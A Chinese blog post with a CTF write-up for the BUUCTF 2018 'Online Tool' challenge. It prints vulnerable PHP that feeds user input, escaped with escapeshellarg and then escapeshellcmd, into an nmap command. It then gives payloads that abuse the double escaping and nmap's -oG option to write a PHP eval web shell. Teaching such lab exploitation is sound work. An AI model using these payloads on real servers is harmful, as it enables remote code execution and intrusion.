BUUCTF:[BUUCTF 2018]Online Tool

最新推荐文章于 2024-08-20 10:53:37 发布
最新推荐文章于 2024-08-20 10:53:37 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/110605396
版权 
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool

在这里插入图片描述

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

考查点:

利用escapeshellarg()+escapeshellcmd()的两次转义,导致闭合单引号后即可执行任意参数,然后利用Nmap的-oG参数写入shell

?host='<?php phpinfo();?> -oG 1.php '

?host='<?php eval($_POST["cmd"]);?> -oG shell.php '

在这里插入图片描述
在这里插入图片描述
PS:这里我有个疑问,网上看的题解里面好像都不能清楚的解释为什么?host='<?php eval($_POST["cmd"]);?> -oG shell.php '这里最后的单引号的前面要加个空格,不太明白,有师傅清楚的话,麻烦评论区指点一下,谢谢

末 初
关注
专栏目录
BUUCTF 2018 Online Tool
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
[BUUCTF 2018]Online Tool
bazzza的博客
12-25 274
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 escapeshellcmd — shell 元字符转义 escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任.
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
最新发布
Da1NtY的博客
08-20 787
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 2953
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
BUUCTF__[BUUCTF 2018]Online Tool_题解
风过江南乱的博客
07-18 822
前言 今天看到了一位学长写的关于这题的wp。 有一句:“我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。” 太真实了。。。有点迷。 研究 看题目源码就目标很明确,利用$host 变量system()命令执行 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['h
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3968
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
[BUUCTF 2018]Online Tool PHP代码审计
m0_46412682的博客
08-13 248
[BUUCTF 2018]Online Tool PHP代码审计 题目一开始的一段代码 这里的知识点是nmap -oG 可以写入文件 例如: nmap <?php eval($_POST['cmd']); ?> -oG 1.php 这里是host传参,但是不能直接写入,因为前面有两个函数过滤单引号之类的特殊字符 escapeshellarg的用处是有单引号就会在前面加个\转义,并且将两边的字符用单引号括起来,例如: $host = "a'"; escapeshellarg($host); ec
BUUCTF [BUUCTF 2018] Online Tool
Senimo
12-09 1545
BUUCTF [BUUCTF 2018] Online Tool 考点: escapeshellarg绕过(参考链接) Nmap -oG 将命令和结果写入文件 启动靶机,给出了页面源码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { high
BUUCTF 2018-Online Tool
paidx0
08-17 278
BUUCTF 2018-Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = esc
Oracle DBA:使回滚段ONLINE操作指南
"使回滚段ONLINE-oracle dba" 在Oracle数据库管理中,回滚段(Rollback Segments)是存储事务回滚信息的关键组件,这些信息用于在事务撤销时恢复数据库到先前的状态。当回滚段遇到问题或者需要进行特定维护时,管理...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值